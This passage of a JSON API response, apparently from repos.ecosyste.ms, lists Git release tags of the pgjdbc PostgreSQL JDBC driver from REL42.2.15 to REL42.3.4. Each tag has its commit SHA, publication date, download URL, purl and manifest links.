4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.4/manifests"},{"name":"REL42.3.4-rc1","sha":"b4a9346c1b0089c04eb448224ab8fbfcae586450","kind":"tag","published_at":"2022-04-15T18:02:03.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.4-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.4-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.4-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.4-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.4-rc1/manifests"},{"name":"REL42.3.3","sha":"9effea487dca529dc5cb0e71600a8c6509819c56","kind":"tag","published_at":"2022-02-15T19:24:12.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.3","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.3/manifests"},{"name":"REL42.3.3-rc1","sha":"9effea487dca529dc5cb0e71600a8c6509819c56","kind":"tag","published_at":"2022-02-15T19:07:20.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.3-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.3-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.3-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.3-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.3-rc1/manifests"},{"name":"REL42.2.25","sha":"6f64a38627c12f8b515c8862682572cd1aff0ff8","kind":"tag","published_at":"2022-02-01T20:20:34.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.25","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.25/manifests"},{"name":"REL42.2.25-rc1","sha":"6f64a38627c12f8b515c8862682572cd1aff0ff8","kind":"tag","published_at":"2022-02-01T20:17:56.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.25-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.25-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.25-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.25-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.25-rc1/manifests"},{"name":"REL42.3.2-rc2","sha":"728c04ee8d26dcc4bca51503c2e93ad87ef8ce87","kind":"tag","published_at":"2022-02-01T14:52:13.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.2-rc2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.2-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.2-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.2-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.2-rc2/manifests"},{"name":"REL42.3.2","sha":"728c04ee8d26dcc4bca51503c2e93ad87ef8ce87","kind":"commit","published_at":"2022-02-01T14:47:11.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.2/manifests"},{"name":"REL42.3.2-rc1","sha":"cfc4b1106b8f4931dee8241671c3880f5f947727","kind":"tag","published_at":"2022-01-31T19:31:07.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.2-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.2-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.2-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.2-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.2-rc1/manifests"},{"name":"REL42.3.1","sha":"3cf846e019767590cc1a4c1b90246ebc26bc5130","kind":"tag","published_at":"2021-10-29T17:23:55.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.1/manifests"},{"name":"REL42.3.1-rc2","sha":"3cf846e019767590cc1a4c1b90246ebc26bc5130","kind":"tag","published_at":"2021-10-29T17:18:55.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.1-rc2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.1-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.1-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.1-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.1-rc2/manifests"},{"name":"REL42.3.1-rc1","sha":"b3050e60f81b4e43fae452bcf6df297df2048ae4","kind":"tag","published_at":"2021-10-28T16:27:29.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.1-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.1-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.1-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.1-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.1-rc1/manifests"},{"name":"REL42.3.0","sha":"6d93eb817f334b383d2c8716a50d8c1255e24236","kind":"tag","published_at":"2021-10-18T15:17:42.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.0","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.0/manifests"},{"name":"REL42.3.0-rc2","sha":"6d93eb817f334b383d2c8716a50d8c1255e24236","kind":"tag","published_at":"2021-10-15T12:59:13.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.0-rc2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.0-rc2/manifests"},{"name":"REL42.2.24","sha":"512799b4aa5efe08247ff46fd128963f07483cf5","kind":"tag","published_at":"2021-09-23T11:15:50.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.24","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.24/manifests"},{"name":"REL42.2.24-rc2","sha":"512799b4aa5efe08247ff46fd128963f07483cf5","kind":"tag","published_at":"2021-09-23T11:05:37.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.24-rc2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.24-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.24-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.24-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.24-rc2/manifests"},{"name":"REL42.2.24-rc1","sha":"512799b4aa5efe08247ff46fd128963f07483cf5","kind":"tag","published_at":"2021-09-23T11:02:30.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.24-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.24-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.24-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.24-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.24-rc1/manifests"},{"name":"REL42.2.23","sha":"d985dc19945dce93e09863b44118896927ef6d1f","kind":"tag","published_at":"2021-07-06T15:41:32.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.23","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.23/manifests"},{"name":"REL42.2.23-rc6","sha":"d985dc19945dce93e09863b44118896927ef6d1f","kind":"tag","published_at":"2021-07-06T15:21:51.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.23-rc6","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.23-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.23-rc6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.23-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.23-rc6/manifests"},{"name":"REL42.2.23-rc5","sha":"624d8b88dde210447f921725682ebd58e7466bf0","kind":"tag","published_at":"2021-07-05T15:30:58.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.23-rc5","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.23-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.23-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.23-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.23-rc5/manifests"},{"name":"REL42.2.23-rc4","sha":"70f576c5ec6cf0d24c942b7b337ba164665e6fd3","kind":"tag","published_at":"2021-07-05T14:55:54.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.23-rc4","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.23-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.23-rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.23-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.23-rc4/manifests"},{"name":"REL42.2.23-rc3","sha":"70f576c5ec6cf0d24c942b7b337ba164665e6fd3","kind":"tag","published_at":"2021-07-05T12:52:17.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.23-rc3","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.23-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.23-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.23-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.23-rc3/manifests"},{"name":"REL42.2.23-rc1","sha":"70f576c5ec6cf0d24c942b7b337ba164665e6fd3","kind":"tag","published_at":"2021-07-05T12:37:07.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.23-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.23-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.23-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.23-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.23-rc1/manifests"},{"name":"REL42.2.22-rc1","sha":"466bad19c4340c3808b718cad0ea8e0f347a28b3","kind":"tag","published_at":"2021-06-16T15:08:48.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.22-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.22-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.22-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.22-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.22-rc1/manifests"},{"name":"REL42.2.22","sha":"466bad19c4340c3808b718cad0ea8e0f347a28b3","kind":"commit","published_at":"2021-06-16T14:49:54.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.22","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.22/manifests"},{"name":"REL42.2.21","sha":"90e694d15223acdd252a49deb7528742adeb1554","kind":"tag","published_at":"2021-06-10T18:44:08.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.21","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.21/manifests"},{"name":"REL42.2.21-rc2","sha":"90e694d15223acdd252a49deb7528742adeb1554","kind":"tag","published_at":"2021-06-10T18:23:59.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.21-rc2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.21-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.21-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.21-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.21-rc2/manifests"},{"name":"REL42.2.21-rc1","sha":"90e694d15223acdd252a49deb7528742adeb1554","kind":"tag","published_at":"2021-06-10T18:21:21.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.21-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.21-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.21-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.21-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.21-rc1/manifests"},{"name":"REL42.2.20","sha":"1a15d6edfecb58dcd5d81f9de8262c3fc89ada07","kind":"tag","published_at":"2021-04-22T13:23:29.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.20","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.20/manifests"},{"name":"REL42.2.20-rc2","sha":"1a15d6edfecb58dcd5d81f9de8262c3fc89ada07","kind":"tag","published_at":"2021-04-22T13:03:02.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.20-rc2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.20-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.20-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.20-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.20-rc2/manifests"},{"name":"REL42.2.20-rc1","sha":"1a15d6edfecb58dcd5d81f9de8262c3fc89ada07","kind":"tag","published_at":"2021-04-22T12:37:14.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.20-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.20-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.20-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.20-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.20-rc1/manifests"},{"name":"REL42.2.19","sha":"207ce36ec2c5cce30c454afa3e51f39bbe5bd26b","kind":"tag","published_at":"2021-02-18T19:32:40.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.19","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.19/manifests"},{"name":"REL42.2.19-rc2","sha":"207ce36ec2c5cce30c454afa3e51f39bbe5bd26b","kind":"tag","published_at":"2021-02-18T18:45:21.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.19-rc2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.19-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.19-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.19-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.19-rc2/manifests"},{"name":"REL42.2.19-rc1","sha":"18cec592278e7f16bacdd5083017686be41d9da6","kind":"tag","published_at":"2021-02-18T15:21:55.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.19-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.19-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.19-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.19-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.19-rc1/manifests"},{"name":"REL42.2.18","sha":"7b7d2a9140dba1733cdd4bb720912621578ba846","kind":"tag","published_at":"2020-10-15T13:45:39.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.18","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.18/manifests"},{"name":"REL42.2.18-rc1","sha":"7b7d2a9140dba1733cdd4bb720912621578ba846","kind":"tag","published_at":"2020-10-15T13:12:32.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.18-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.18-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.18-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.18-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.18-rc1/manifests"},{"name":"REL42.2.17","sha":"901962b028e6061227bfd2124ab6e245e9c952a3","kind":"tag","published_at":"2020-10-09T13:43:49.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.17","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.17/manifests"},{"name":"REL42.2.17-rc1","sha":"901962b028e6061227bfd2124ab6e245e9c952a3","kind":"tag","published_at":"2020-10-09T12:29:44.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.17-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.17-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.17-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.17-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.17-rc1/manifests"},{"name":"REL42.2.16","sha":"5e4bbc88ccea2e9ff1f9bb02e3d17893a6f630e3","kind":"tag","published_at":"2020-08-21T19:33:24.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.16","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.16/manifests"},{"name":"REL42.2.16-rc2","sha":"5e4bbc88ccea2e9ff1f9bb02e3d17893a6f630e3","kind":"tag","published_at":"2020-08-21T18:15:23.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.16-rc2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.16-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.16-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.16-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.16-rc2/manifests"},{"name":"REL42.2.16-rc1","sha":"3792f47ebfad1f7c746abcc1f6ed6d0411fbbb0c","kind":"tag","published_at":"2020-08-21T17:04:02.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.16-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.16-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.16-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.16-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.16-rc1/manifests"},{"name":"REL42.2.15","sha":"3802b453608349b11a81585f3dbca9f623687d3d","kind":"tag","published_at":"2020-08-14T18:24:59.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.15","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/